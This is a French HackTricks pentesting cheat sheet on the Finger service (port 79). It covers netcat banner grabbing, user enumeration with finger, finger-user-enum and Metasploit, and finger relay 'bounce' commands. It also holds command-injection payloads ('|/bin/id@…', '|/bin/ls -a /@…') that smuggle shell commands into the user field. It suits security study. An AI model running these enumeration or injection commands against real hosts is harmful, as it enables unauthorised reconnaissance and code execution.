hacktricks/network-services-pentesting/pentesting-finger.md

80 lines
4 KiB
Markdown
Raw Normal View History

# 79 - Pentesting Finger
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Autres moyens de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**merchandising officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La Famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection d'[**NFTs**](https://opensea.io/collection/the-peass-family) exclusifs
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux dépôts github** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
2023-06-03 13:10:46 +00:00
## **Informations de base**
2022-04-28 16:01:33 +00:00
**Finger** est un programme que vous pouvez utiliser pour trouver des informations sur les utilisateurs d'ordinateurs. Il liste généralement le nom de connexion, le nom complet, et éventuellement d'autres détails sur l'utilisateur que vous interrogez. Ces détails peuvent inclure l'emplacement du bureau et le numéro de téléphone (si connus), l'heure de connexion, le temps d'inactivité, l'heure à laquelle le courrier a été lu pour la dernière fois, et les fichiers de plan et de projet de l'utilisateur.
**Port par défaut :** 79
2022-05-08 23:13:03 +00:00
```
PORT STATE SERVICE
79/tcp open finger
```
2023-06-03 13:10:46 +00:00
## **Énumération**
2023-06-03 13:10:46 +00:00
### **Récupération de bannière/Connexion de base**
```bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
```
### **Énumération des utilisateurs**
```bash
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
```
Vous pouvez également utiliser **finger-user-enum** de [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), voici quelques exemples :
```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```
#### **Nmap exécute un script en utilisant les scripts par défaut**
### Metasploit utilise plus d'astuces que Nmap
2022-05-08 23:13:03 +00:00
```
use auxiliary/scanner/finger/finger_users
```
2022-05-08 23:13:03 +00:00
### Shodan
* `port:79 USER`
## Exécution de commande
```bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```
## Rebond Finger
[Utiliser un système comme relais finger](https://securiteam.com/exploits/2BUQ2RFQ0I/)
2022-05-08 23:13:03 +00:00
```
finger user@host@victim
finger @internal@external
```
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
Autres moyens de soutenir HackTricks :
2022-04-28 16:01:33 +00:00
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**merchandising officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La Famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection d'[**NFTs**](https://opensea.io/collection/the-peass-family) exclusifs
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez**-moi sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux dépôts github** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
2022-04-28 16:01:33 +00:00
</details>